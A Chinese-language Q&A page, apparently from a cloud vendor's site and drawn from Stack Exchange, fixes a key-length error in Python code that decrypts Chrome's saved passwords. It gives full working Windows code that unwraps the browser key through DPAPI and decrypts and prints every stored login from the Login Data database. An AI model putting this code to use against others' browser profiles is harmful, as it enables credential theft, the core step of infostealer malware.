You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

使用Python解密Chrome密码报AES密钥长度356字节错误如何解决

错误原因

你从Chrome Local State 文件中提取的 encrypted_key 是Base64编码的字符串,还包含固定前缀,并非原生可用的AES密钥。AES仅支持16/24/32字节长度的密钥(对应AES-128/AES-192/AES-256),直接传入原始字符串会触发长度错误。

修复步骤(Windows平台)
  • 先安装必要依赖:
    pip install pywin32 pycryptodome
  • 对原始密钥做解码、去前缀、DPAPI解密处理,同时补充GCM模式的tag校验逻辑,修复后的完整代码如下:
import base64
import win32crypt
import sqlite3
from Cryptodome.Cipher import AES

# 替换为你从Local State中复制的原始encrypted_key字符串
raw_secret_key = "<替换为你的原始密钥字符串>"

# 密钥预处理流程
decoded_key = base64.b64decode(raw_secret_key)
# 去掉解码后前5字节的固定"DPAPI"前缀
stripped_key = decoded_key[5:]
# 调用Windows DPAPI接口解密得到真实AES密钥
secret_key = win32crypt.CryptUnprotectData(stripped_key, None, None, None, 0)[1]

# 读取Login Data数据库逻辑
conn = sqlite3.connect("login.db")
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins")

for index,login in enumerate(cursor.fetchall()):
    url = login[0]
    username = login[1]
    ciphertext= login[2]
    # 跳过非Chrome v10版本加密的旧密码
    if not ciphertext.startswith(b'v10'):
        continue
    print("Url:",url)
    print("Username:",username)
    # 提取IV、加密内容、GCM校验tag
    initialisation_vector = ciphertext[3:15]
    encrypted_password = ciphertext[15:-16]
    gcm_tag = ciphertext[-16:]
    # 解密
    cipher = AES.new(secret_key, AES.MODE_GCM, initialisation_vector)
    decrypted_pass = cipher.decrypt_and_verify(encrypted_password, gcm_tag)
    decrypted_pass = decrypted_pass.decode()
    print("Decrypted Password:", decrypted_pass, "\n")

conn.close()
其他平台注意事项
  • MacOS平台:Chrome密钥存储在系统钥匙串中,需通过security命令读取解密,无需DPAPI调用
  • Linux平台:Chrome密钥用libsecret加密存储,需调用对应libsecret接口解密

内容的提问来源于stack exchange,提问作者Archangel

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.10.06 14:36:02